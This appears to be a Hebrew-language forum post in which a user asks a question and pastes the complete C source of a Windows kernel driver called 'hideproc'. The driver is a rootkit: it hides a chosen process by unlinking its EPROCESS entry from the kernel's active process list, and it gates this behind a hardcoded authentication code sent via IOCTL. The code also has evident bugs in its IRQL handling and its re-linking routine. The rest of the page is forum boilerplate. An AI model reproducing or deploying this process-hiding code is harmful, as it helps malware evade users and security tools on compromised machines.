אהלן, יש לי שאלות בנושא העברית, עבודה עם קבצים

הנה הקוד:

קוד:


#include"ntddk.h"

 

typedefunsignedlong DWORD;

typedef DWORD * PDWORD;

typedefunsignedlong ULONG;

const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\hideproc";

const WCHAR deviceNameBuffer[] = L"\\Device\\hideproc";

int FLINKOFFSET;

int PIDOFFSET;

int AUTHDONE;

KIRQL oldlvl;

 

DWORD FindProcessEPROC(int);

void AddProcessToCRP(int);

NTSTATUS DeviceDispatch(IN PDEVICE_OBJECT, IN PIRP);

NTSTATUS DeviceUnload(IN PDRIVER_OBJECT);

 

 

NTSTATUS DriverEntry(

IN PDRIVER_OBJECT DriverObject,

IN PUNICODE_STRING RegistryPath

)

{



NTSTATUS ntStatus;

UNICODE_STRING deviceNameUnicodeString;

UNICODE_STRING deviceLinkUnicodeString;

PDEVICE_OBJECT devObject;

 

RtlInitUnicodeString (&deviceNameUnicodeString,

deviceNameBuffer );

RtlInitUnicodeString (&deviceLinkUnicodeString,

deviceLinkBuffer );

ntStatus = IoCreateDevice ( DriverObject,

8, // exchange buffer length

&deviceNameUnicodeString,

FILE_DEVICE_UNKNOWN,

0,

TRUE,

&devObject );

if(! NT_SUCCESS(ntStatus))

{

return ntStatus;

}





ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,

&deviceNameUnicodeString );

if(! NT_SUCCESS(ntStatus)) 

{

IoDeleteDevice(DriverObject->DeviceObject);

return ntStatus;

}

 

DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =

DriverObject->MajorFunction[IRP_MJ_CREATE] =

DriverObject->MajorFunction[IRP_MJ_CLOSE] =

DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DeviceDispatch;

DriverObject->DriverUnload = DeviceUnload;

AUTHDONE=0;



return STATUS_SUCCESS;

}

 

NTSTATUS DeviceUnload(IN PDRIVER_OBJECT DriverObject)

{

UNICODE_STRING deviceLinkUnicodeString;

PDEVICE_OBJECT p_NextObj;

p_NextObj = DriverObject->DeviceObject;

if (p_NextObj != NULL)

{

RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );

IoDeleteSymbolicLink( &deviceLinkUnicodeString );

IoDeleteDevice( DriverObject->DeviceObject );

return STATUS_SUCCESS;

}

return STATUS_SUCCESS;

}

 

NTSTATUS DeviceDispatch(

IN PDEVICE_OBJECT DeviceObject, 

IN PIRP Irp 

)

{

PIO_STACK_LOCATION irpStack;

PVOID buff = 0;

NTSTATUS ntstatus;

int find_PID = 0;

int authcode = 0;

DWORD eproc = 0;

PLIST_ENTRY plist_active_procs = NULL;

 

ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;

Irp->IoStatus.Information = 0;

irpStack = IoGetCurrentIrpStackLocation (Irp);

switch (irpStack->MajorFunction) {

case IRP_MJ_CREATE:

break;

case IRP_MJ_SHUTDOWN:

break;

case IRP_MJ_CLOSE:

break;

case IRP_MJ_DEVICE_CONTROL:

buff=Irp->AssociatedIrp.SystemBuffer;

switch (irpStack->Parameters.DeviceIoControl.IoControlCode) {

case 1002: // auth

if (!AUTHDONE)

{

authcode=((int) (*(int *)buff));

if ( authcode == 5281982 )

{

AUTHDONE=1;

Irp->IoStatus.Information = 100;

}

}

else// add proc to CPRs

{

if (FLINKOFFSET == 0 || PIDOFFSET == 0)

{

Irp->IoStatus.Information = 1; // not init

break;

}

find_PID = (int) (*(int *)buff);

if (find_PID==0)

{

Irp->IoStatus.Information = 2; // zero pid/eproc

break;

}

AddProcessToCRP(find_PID);

}

break;

case 1000: // initialize offsets (1000)

if (!AUTHDONE) break;

PIDOFFSET = (int) (*(int *)buff);

FLINKOFFSET = (int) (*((int *)buff+1));

break;

case 1001: // hide proc (1001)

if (!AUTHDONE) break;

if (FLINKOFFSET == 0 || PIDOFFSET == 0)

{

Irp->IoStatus.Information = 1; // not init

break;

}

find_PID = (int) (*(int *)buff);

if (find_PID==0)

{

Irp->IoStatus.Information = 2; // zero pid

break;

}



eproc = FindProcessEPROC(find_PID);

if (eproc == 0)

{

Irp->IoStatus.Information = 3; // invalid pid

KeLowerIrql(oldlvl);

break;

}

Irp->IoStatus.Information = eproc;

plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);

*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;

*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;

KeLowerIrql(oldlvl);

break;

}



break;

}

IoCompleteRequest( Irp, IO_NO_INCREMENT );

return ntstatus; 

}

 

DWORD FindProcessEPROC (int terminate_PID)

{

DWORD eproc = 0x00000000; 

int current_PID = 0;

int start_PID = 0; 

int i_count = 0;

PLIST_ENTRY plist_active_procs;

if (terminate_PID == 0)

return terminate_PID;

eproc = (DWORD) PsGetCurrentProcess();

start_PID = *((DWORD*)(eproc+PIDOFFSET));

current_PID = start_PID;

KeRaiseIrql(DISPATCH_LEVEL,&oldlvl);

while(1)

{

if(terminate_PID == current_PID)

return eproc;

elseif((i_count >= 1) && (start_PID == current_PID))

{

return 0x00000000;

}

else {

plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);

eproc = (DWORD) plist_active_procs->Flink;

eproc = eproc - FLINKOFFSET;

current_PID = *((int *)(eproc+PIDOFFSET));

i_count++;

}

}

}

void AddProcessToCRP(int eproc)

{

DWORD ep = eproc+FLINKOFFSET;

PLIST_ENTRY plist_active_procs;

plist_active_procs = (LIST_ENTRY *) (ep);

*((DWORD *)plist_active_procs->Blink) =

*((DWORD *)plist_active_procs->Flink+1) = ep;

}

אפשרויות משלוח הודעות

אתה לא יכול לפתוח אשכולות חדשים

אתה לא יכול להגיב לאשכולות

אתה לא יכול לצרף קבצים

אתה לא יכול לערוך את ההודעות שלך

קוד vB פעיל

סמיילים פעיל

קוד [IMG] פעיל

קוד HTML כבוי

כלי אשכול	חפש באשכול זה
הצג גירסת הדפסה שלח דף זה ב E-Mail	חפש באשכול זה: חיפוש מתקדם
מצבי תצוגה	דרג אשכול זה
עבור למצב לינארי מצב כלאיים עבור למצב משורשר	דרג אשכול זה:

הדף נוצר ב 0.05 שניות עם 12 שאילתות
צור קשר - Fresh - למעלה